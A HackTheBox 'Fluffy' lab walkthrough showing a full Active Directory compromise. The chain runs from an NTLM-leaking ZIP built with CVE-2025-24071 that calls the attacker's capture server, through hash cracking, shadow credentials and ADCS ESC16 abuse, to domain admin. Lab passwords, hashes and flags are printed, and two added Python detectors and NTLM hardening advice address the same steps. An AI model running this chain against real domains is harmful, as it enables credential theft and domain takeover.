Fluffy (HTB) - Active Directory Attack Walkthrough
Overview
This walkthrough details the step-by-step process of compromising the “Fluffy” Windows Active Directory environment on HackTheBox. The attack path demonstrates real-world red team tactics, including enumeration, exploitation, lateral movement, and privilege escalation, with a focus on ADCS and Kerberos abuse.
1. Initial Access & Enumeration
- Credentials provided: j.fleischman / J0elTHEM4n1990!
- Target: 10.10.11.69 (Windows AD)
Port & Service Discovery
nmap 10.10.11.69
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
- Key services: Kerberos, LDAP, SMB, WinRM, etc.
User & Share Enumeration
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.69 445 DC01 Administrator 2025-04-17 15:45:01 0 Built-in account for administering the computer/domain
SMB 10.10.11.69 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.69 445 DC01 krbtgt 2025-04-17 16:00:02 0 Key Distribution Center Service Account
SMB 10.10.11.69 445 DC01 ca_svc 2025-04-17 16:07:50 0
SMB 10.10.11.69 445 DC01 ldap_svc 2025-04-17 16:17:00 0
SMB 10.10.11.69 445 DC01 p.agila 2025-04-18 14:37:08 0
SMB 10.10.11.69 445 DC01 winrm_svc 2025-05-18 00:51:16 0
SMB 10.10.11.69 445 DC01 j.coffey 2025-04-19 12:09:55 0
SMB 10.10.11.69 445 DC01 j.fleischman 2025-05-16 14:46:55 0
SMB 10.10.11.69 445 DC01 [*] Enumerated 9 local users: FLUFFY
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
# Found writable share named IT
-> exploring the IT share
> impacket-smbclient j.fleischman:'J0elTHEM4n1990!'@10.10.11.69
# get Upgrade_Notice.pdf
# get Everything-1.4.1.1026.x64.zip
# get KeePass-2.58.zip
-> Download the files and read the notice PDF. Reviewing the PDF tells us we can exploit CVE-2025-24071.
2. Exploitation: NTLM Hash Leak (CVE-2025-24071)
1) fire up msfconsole
msfconsole -q
msf6 > search CVE-2025-24071
# module used: auxiliary/windows/misc/ntlm_hash_leak
set attacker_ip 10.10.16.23
set filename hacked.zip
run
# generates the malicious zip file; module output:
[*] Malicious ZIP file created: hacked.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
2) start the NTLM capture server
# msfconsole
use server/capture/smb
run
3) upload hacked.zip to the IT share and trigger it on the victim
> smbclient //10.10.11.69/it -U j.fleischman # pass J0elTHEM4n1990!
put hacked.zip
tar hacked.zip
-> Now back to the SMB capture server:
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.69
...
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:1e92d1bc8ef6d5e9:29f16b8ec07f6f473bbfdc065b55b08d:...
-> got a NetNTLMv2 hash, but it cannot be used directly: impacket's pass-the-hash takes an NT hash, not a NetNTLMv2 challenge-response, so we need to crack it.
# save the hash into a file and fire up john
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:01 DONE (2025-06-20 18:51) 0.6578g/s 2974Kp/s 2974Kc/s 2974KC/s proquis..prison only
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
-> Found username : p.agila
password : prometheusx-303
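A defender's counterpart to the capture above, added here as an example and not part of the original walkthrough: a small triage over Sysmon Event ID 3 (network connection) records that flags outbound SMB from a workstation to an address outside the internal ranges, which is the observable a forced-authentication lure like this one produces. The internal ranges, the victim workstation address 10.10.11.50 and the event records are assumptions constructed for the example; only 10.10.11.69 (the DC) and 10.10.16.23 (the capture host) come from the write-up.

```python
"""Triage Sysmon Event ID 3 records for outbound SMB to non-internal hosts.

A forced-authentication lure makes the victim open an SMB session to the
attacker's machine and hand over a NetNTLMv2 challenge/response.  Outbound
445/139 from a workstation to an address that is not an internal file server
is the signal a defender can alert on.  All records here are constructed.
"""
from __future__ import annotations
import ipaddress
from typing import Iterable

# Assumption: the organisation's own address space (the lab DC is in 10.10.11.0/24).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.10.11.0/24", "192.168.0.0/16")]
SMB_PORTS = {445, 139}


def is_internal(ip: str) -> bool:
    """True when ip falls inside one of the internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_outbound_smb(events: Iterable[dict]) -> list[dict]:
    """Return the Event ID 3 records that describe an outbound SMB
    connection to a destination outside the internal ranges."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 3 or ev.get("Initiated") != "true":
            continue                      # only outbound connections
        if int(ev.get("DestinationPort", 0)) not in SMB_PORTS:
            continue
        if is_internal(ev["DestinationIp"]):
            continue                      # normal file-server / DC traffic
        hits.append(ev)
    return hits


# Constructed sample: DC and internal file-server traffic are benign; the
# third record is the shape of the lure firing - explorer.exe talking SMB to
# the capture host used in this write-up; the fourth is ordinary HTTPS.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "true",
     "SourceIp": "10.10.11.50", "DestinationIp": "10.10.11.69", "DestinationPort": "445"},
    {"EventID": 3, "Image": "C:\\Windows\\explorer.exe", "Initiated": "true",
     "SourceIp": "10.10.11.50", "DestinationIp": "192.168.5.20", "DestinationPort": "445"},
    {"EventID": 3, "Image": "C:\\Windows\\explorer.exe", "Initiated": "true",
     "SourceIp": "10.10.11.50", "DestinationIp": "10.10.16.23", "DestinationPort": "445"},
    {"EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Initiated": "true",
     "SourceIp": "10.10.11.50", "DestinationIp": "93.184.216.34", "DestinationPort": "443"},
]

if __name__ == "__main__":
    for hit in flag_outbound_smb(SAMPLE_EVENTS):
        print(f"outbound SMB from {hit['Image']} to {hit['DestinationIp']}:{hit['DestinationPort']}")
```

Alerting is the reactive half; the preventive half on a Windows estate is the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" (run it in Audit all mode first, then Deny all) together with blocking outbound 445/139 at the perimeter, so the leaked response never leaves the network even when the lure is opened.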
3. BloodHound & Group Escalation
# using bloodhound-python (the CLI collector) to map relationships
bloodhound-python -c all -d fluffy.htb -u p.agila -p prometheusx-303 --zip -ns 10.10.11.69
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 54S
INFO: Compressing output into 20250620195310_bloodhound.zip
-> Analyse the collected data by unzipping 20250620195310_bloodhound.zip.
# add p.agila to the Service Accounts group using bloodyAD
bloodyAD -u p.agila -p prometheusx-303 --host 10.10.11.69 -d dc01.fluffy.htb add groupMember 'SERVICE ACCOUNTS' 'p.agila'
[+] p.agila added to SERVICE ACCOUNTS
4. Shadow Credentials Attack (winrm_svc)
> impacket-GetUserSPNs -request -dc-ip 10.10.11.69 'fluffy.htb'/'p.agila':'prometheusx-303'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- --------- --------------------------------------------- -------------------------- -------------------------- ----------
ADCS/ca.fluffy.htb ca_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 21:37:50.136701 2025-06-21 04:23:54.544982
LDAP/ldap.fluffy.htb ldap_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 21:47:00.599545 <never>
WINRM/winrm.fluffy.htb winrm_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-05-18 06:21:16.786913 2025-05-19 20:43:22.188468
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
# installing pywhisker
pipx install pywhisker # unofficial library
---
# listing the existing key credentials on winrm_svc
pywhisker -a list -t winrm_svc -d fluffy.htb -u p.agila -p prometheusx-303 --dc-ip $target
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Listing devices for winrm_svc
[*] DeviceID: 1ea372ed-2084-6b06-81f3-6e3b1a4c3a4d | Creation Time (UTC): 2025-06-22 07:03:10.904001
[*] DeviceID: c4643ac6-6cb5-9454-fdd9-a43e5076fdbf | Creation Time (UTC): 2025-06-22 13:48:48.916580
# adding a key credential to winrm_svc to gain access
pywhisker -a add -t winrm_svc -d fluffy.htb -u p.agila -p prometheusx-303 --dc-ip $target
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2ea213e5-d3eb-02ac-7982-51dd4a445e20
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 0Y0itlEm.pfx
[*] Must be used with password: gMcZasXtUESCK9fUdHRZ
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
-> to authenticate as winrm_svc we need to install and use the following tools:
- https://github.com/dirkjanm/PKINITtools
# init virtual environment
- python -m venv tempenv
- source tempenv/bin/activate
# clone repo
git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos
-> now we have the KeyCredential, but we still need a TGT, so we use the gettgtpkinit.py script.
-> on the first attempt we hit a time-sync error: "The clock skew is too great"
python gettgtpkinit.py -cert-pfx 0Y0itlEm.pfx -pfx-pass gMcZasXtUESCK9fUdHRZ fluffy.htb/winrm_svc winrm_svc.ccache
..
res = sock.sendrecv(req)
File "/home/kaulik/Documents/WalkThroughs/Hackthebox/Fluffy/tempenv/lib/python3.13/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"
-> To avoid this error we have to fake the local time, using faketime.
# first check the current time on the target DC
> net time -S 10.10.11.69
Sun Jun 22 23:00:58 2025
# now use faketime to avoid the error and obtain the TGT
# faketime can be installed with apt (kali)
> faketime 'Sun Jun 22 23:00:58 2025' python gettgtpkinit.py -cert-pfx 0Y0itlEm.pfx -pfx-pass gMcZasXtUESCK9fUdHRZ fluffy.htb/winrm_svc winrm_svc.ccache
2025-06-22 23:00:58,621 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-22 23:00:58,648 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-22 23:01:18,730 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-22 23:01:18,730 minikerberos INFO aa053df3d974a3c7cf06cc59ef8d0dccabd92e5dfcd035af3bb8772065442293
INFO:minikerberos:aa053df3d974a3c7cf06cc59ef8d0dccabd92e5dfcd035af3bb8772065442293
2025-06-22 23:01:18,741 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
# the TGT is now saved in the file winrm_svc.ccache
Now time for the NT hash
-> getting the NT hash also requires faketime, so be ready.
-> getnthash.py also needs the KRB5CCNAME environment variable set:
# add this line to your shell config file, e.g. .bashrc or .zshrc,
# or just set it in your terminal session.
export KRB5CCNAME="/home/user/fluffy/winrm_svc.ccache" # replace with your own directory
> net time -S 10.10.11.69
Sun Jun 22 23:39:22 2025
> faketime 'Sun Jun 22 23:39:22 2025' python3 getnthash.py fluffy.htb/winrm_svc -key aa053df3d974a3c7cf06cc59ef8d0dccabd92e5dfcd035af3bb8772065442293
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
33bd09dcd697600edf6b3a7af4875767
-> got NT hash : 33bd09dcd697600edf6b3a7af4875767
5. Escalation: ca_svc & ADCS ESC16
- Used certipy-ad to perform the shadow credentials attack on ca_svc:
faketime 'Mon Jun 23 00:54:02 2025' certipy-ad shadow auto -account ca_svc -target-ip 10.10.11.69 -u winrm_svc@fluffy.htb -hashes :33bd09dcd697600edf6b3a7af4875767
- Found ESC16 vulnerability in ADCS (security extension disabled).
- Changed the UPN of ca_svc to administrator and requested a certificate:
certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' update -upn 'administrator'
faketime 'Mon Jun 23 22:01:00 2025' certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
- Authenticated as administrator, extracted the NTLM hash, and obtained root.txt via Evil-WinRM.
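The group-membership change in section 3, the msDS-KeyCredentialLink write in section 4 and the UPN rewrite above each leave a Windows Security-log event. The following is an added example (not from the walkthrough or from any of the tools it uses) that triages constructed records of those events: 4728/4732/4756 for a member added to a sensitive group, 5136 for msDS-KeyCredentialLink and userPrincipalName value writes, and 4738 for a UPN change. The sensitive-group list, the empty allowlist of legitimate key-credential writers, the "Marketing" group and the record contents are assumptions made for the example; account and group names come from the write-up.

```python
"""Triage Windows Security-log records for the directory changes this chain
leaves behind: a member added to a sensitive group (4728/4732/4756), a write
to msDS-KeyCredentialLink (5136), and a userPrincipalName rewrite (4738, or
5136 when Directory Service Changes auditing is enabled).  All records are
constructed for the example, using the Security log's own field names.
"""
from __future__ import annotations
from dataclasses import dataclass

# Assumption: groups whose membership matters in this domain.
SENSITIVE_GROUPS = {"service accounts", "domain admins", "administrators"}
# Assumption: names a UPN may only carry on the matching account itself.
PROTECTED_UPNS = {"administrator"}
# Assumption: accounts allowed to write key credentials (Windows Hello for
# Business / sync infrastructure); empty here, so every write is reported.
KEYCRED_WRITERS_ALLOWLIST: set[str] = set()

GROUP_ADD_EVENTS = {4728, 4732, 4756}   # global / local / universal group
VALUE_ADDED = "%%14674"                 # 5136 OperationType "Value Added"


@dataclass
class Finding:
    event_id: int
    actor: str
    target: str
    reason: str


def upn_local_part(upn: str) -> str:
    """'Administrator@fluffy.htb' -> 'administrator' (bare UPNs pass through)."""
    return upn.split("@", 1)[0].strip().lower()


def audit(events: list[dict]) -> list[Finding]:
    """Return one Finding per record that matches a step of the attack chain."""
    findings: list[Finding] = []
    for ev in events:
        eid = ev["EventID"]
        actor = ev.get("SubjectUserName", "?")
        if eid in GROUP_ADD_EVENTS:
            group = ev["TargetUserName"]          # the group, for these events
            if group.lower() in SENSITIVE_GROUPS:
                findings.append(Finding(eid, actor, ev["MemberName"],
                                        f"member added to sensitive group '{group}'"))
        elif eid == 5136 and ev.get("OperationType") == VALUE_ADDED:
            attr, obj = ev.get("LDAPDisplayName", ""), ev["ObjectDN"]
            if attr == "msDS-KeyCredentialLink" and actor.lower() not in KEYCRED_WRITERS_ALLOWLIST:
                findings.append(Finding(eid, actor, obj,
                                        "msDS-KeyCredentialLink value added (Shadow Credentials shape)"))
            elif attr == "userPrincipalName":
                local = upn_local_part(ev["AttributeValue"])
                if local in PROTECTED_UPNS and not obj.lower().startswith(f"cn={local},"):
                    findings.append(Finding(eid, actor, obj,
                                            f"userPrincipalName set to protected name '{ev['AttributeValue']}'"))
        elif eid == 4738:
            new_upn = ev.get("UserPrincipalName", "-")   # '-' means unchanged
            local = upn_local_part(new_upn)
            if new_upn != "-" and local in PROTECTED_UPNS and ev["TargetUserName"].lower() != local:
                findings.append(Finding(eid, actor, ev["TargetUserName"],
                                        f"userPrincipalName changed to protected name '{new_upn}'"))
    return findings


# Constructed records mirroring sections 3-5 of the write-up, plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "p.agila", "TargetUserName": "SERVICE ACCOUNTS",
     "MemberName": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"},
    {"EventID": 4728, "SubjectUserName": "Administrator", "TargetUserName": "Marketing",
     "MemberName": "CN=j.coffey,CN=Users,DC=fluffy,DC=htb"},                    # benign
    {"EventID": 5136, "SubjectUserName": "p.agila", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
     "LDAPDisplayName": "msDS-KeyCredentialLink",
     "AttributeValue": "B:828:<constructed blob>:CN=winrm service,CN=Users,DC=fluffy,DC=htb"},
    {"EventID": 4738, "SubjectUserName": "p.agila", "TargetUserName": "ca_svc",
     "UserPrincipalName": "administrator"},
    {"EventID": 4738, "SubjectUserName": "j.coffey", "TargetUserName": "j.coffey",
     "UserPrincipalName": "-"},                                                  # benign, UPN unchanged
]

if __name__ == "__main__":
    for f in audit(SAMPLE_EVENTS):
        print(f"{f.event_id} by {f.actor} on {f.target}: {f.reason}")
```

Two caveats when wiring this to real logs: 5136 is only produced when the "Audit Directory Service Changes" subcategory is enabled and the object carries a matching SACL, so without that the msDS-KeyCredentialLink write is invisible and only the downstream PKINIT logon remains; and the 4738 UserPrincipalName field reads "-" for every change that did not touch the UPN, which is why the code treats that value as "no change" rather than as a name.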
Flags
- user.txt:
0c8013ee54bc3241f99049e0be118969
- root.txt:
58ffa17b5e4af0c8fa2d2a836a84997e
Notes & Tools Used
- Tools: nmap, netexec, impacket, bloodhound-python, bloodyAD, pywhisker, PKINITtools, certipy-ad, Evil-WinRM
- Key techniques: NTLM relay, shadow credentials, ADCS misconfig, Kerberos abuse
- Useful references:
- https://www.hackingarticles.in/active-directory-penetration-testing-using-impacket/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse
- https://www.hackingarticles.in/a-detailed-guide-on-certipy/
This walkthrough demonstrates a full compromise of a modern AD environment using chained misconfigurations and credential abuse. Always test in authorized environments.